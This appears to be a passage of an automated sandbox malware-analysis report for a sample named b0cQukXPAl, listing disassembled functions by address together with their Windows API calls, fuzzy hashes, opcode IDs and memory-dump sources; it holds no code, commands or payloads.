Instruction ID: 79b6aba887b0086d29dfedc6be0cd0c92927a235b6548d20e3f760ab27086de1
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 5EE08C31040258EFCF116F60CD08A483B6AFF09B82F004124FA049B130CB36DE66CB84

Function 020F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 020F095F
l, xrefs: 020F0966
GetProcAddress., xrefs: 020F09DC, 020F09DF, 020F09E4

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 47799c3eb4f41998aaec55d70cb5b8d5507aece2028a522da9ac79aad1f6e4cc
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 883168B6904709CFEB51CF99C880AAEBBFAFF08324F14404AD941A7615D771EA45CBA4

Function 004389E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438AAC

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58

Function 02128C49 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 02128D13

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: b79b49c8762f0521a64a70887da198a6c9327e2b85ced341abdc320f9bedd69e
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 84411576940228AFCB249FB9DC48EBB77B9EF80715F104269F905D7180E7319D99CB60

Function 004351B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203

Strings

GetLocaleInfoEx, xrefs: 004351C1, 004351CB

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D

Function 0042EAD0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94

Function 0211ED37 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
Instruction ID: d88aeb35fa7a78ec82bfd35f82b7b0884d0cd8c12193eac919992ac20ab5b34b
Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
Instruction Fuzzy Hash: 08021D71E412199FDF14CFA9C8907ADBBF2EF88314F258269D919E7384D731A942CB90

Function 020F25FB Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 020F2622
PostQuitMessage.USER32(00000000), ref: 020F27C0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction ID: f04dd1769b3776c74c4202b9f425dde38071b7efa9f92bab7f0f1cc7443669d5
Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction Fuzzy Hash: 22411D259A4380A9E731EFA1FC45B2533B0FF54722F10652BD628CB2B2E3B28544C75E

Function 00436CAF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44

Function 02126F16 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02126F11,?,?,00000008,?,?,0212F3D2,00000000), ref: 02127143

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 503bede7de262e4e194198b008014e90c9e09b6934e7a7ab5f8a2fc10b03f4c2
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 5DB15D311506189FD719CF28C486B66BBE0FF45368F258658F899CF2E1C335E9AACB44

Function 0043B635 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99

Function 0212B89C Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

Part of subcall function 02122131: _free.LIBCMT ref: 02122190
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0212219D

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0212B8F0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 09d2b62766d92bddb79ca78a54bbebdba98c6684b0a60fcd30e8c735e5584ce1
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: 2121AA715942269FDF249F24DC41BBA73ADEF44714F10017AFE01D6150E775DA68CB50

Function 0043B2BD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784

Function 0212B524 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02120A0C,?,0212BC79,00000000,?,?,?), ref: 0212B596

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
Instruction ID: e038c584fabfe5e3d5bd4671820afcd87dd9fd6971722c9fd40f0e4e4016b6bc
Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
Instruction Fuzzy Hash: 7D11253B2047115FDB189F38C8A17BABB92FF80358B14442DEA468BB40E771AA56CB40

Function 0043B865 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8

Function 0212BACC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0212B86A,00000000,00000000,?), ref: 0212BAF8

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 03419046bed663fd433bcefabfd61d7b19c2de8f2223272914e1e30a85ae0373
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: AEF0F932A88135ABDB385B248C09BBB7768EB4071CF054429FC45A3144EB70BF25C6D0

Function 0212B892 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

Part of subcall function 02122131: _free.LIBCMT ref: 02122190
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0212219D

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0212B8F0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
Instruction ID: b3622714636973701ce6039c863c6188814c9097761421e5962481b9eee18159
Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
Instruction Fuzzy Hash: B101F232A852259BCB04AF34DC84ABE33A9DF05710F0441BAEF02EB281DB359E188B50

Function 0043B358 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788

Function 0212B5BF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02120A0C,?,0212BC3D,02120A0C,?,?,?,?,?,02120A0C,?,?), ref: 0212B60B

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
Instruction ID: 9cb3d1d37d3a2e6b34a5398b332ff2cd7e9fc0cca8c67101709e9ed8a0f8954b
Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
Instruction Fuzzy Hash: 4AF040363043151FDB245F398C80B7ABBA6EF8032CF14442CFE068B690E7B1A9028B84

Function 02125417 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0212046A,?,00000004), ref: 0212546A

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 2a4f8c71b850f52a79fbd8a682ddb0900b31956e57a5c0babb97e7bab3d94fad
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 18F09631680328BFDB095F60DC05F6E7B66EF04B12F504155FD0566190DB719930AA99

Function 00434DBD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC

EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49

Function 02125024 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0211E644: RtlEnterCriticalSection.NTDLL(01CA0DA5), ref: 0211E653

EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0212505C

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
Instruction ID: cbb462bd2fb8942e42b8cf2cf2a9f8d04e500b3201f84401966aeabe2b83a3d9
Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
Instruction Fuzzy Hash: 01F03C32A50304EFEB14EF68D945B8D77E1AB05711F104166F904DB2E1C7759950CF49

Function 0043B272 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794

Function 0212B4D9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0212BC9B,02120A0C,?,?,?,?,?,02120A0C,?,?,?), ref: 0212B510

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
Instruction ID: f4610d64f47cc5b6e9b86553079d25e2e0291946c47e0c773f09594f256c3b01
Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
Instruction Fuzzy Hash: 9AF0553A34021457CB149F35DC44B6ABF94EFC1754F0A0059FF058B250C3319942C790

Function 00410656 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction Fuzzy Hash:

Function 021008BD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410662,020FFE56), ref: 021008C2

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction Fuzzy Hash:

Function 0043BBB1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBB1

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 00446863 Relevance: .9, Instructions: 923COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

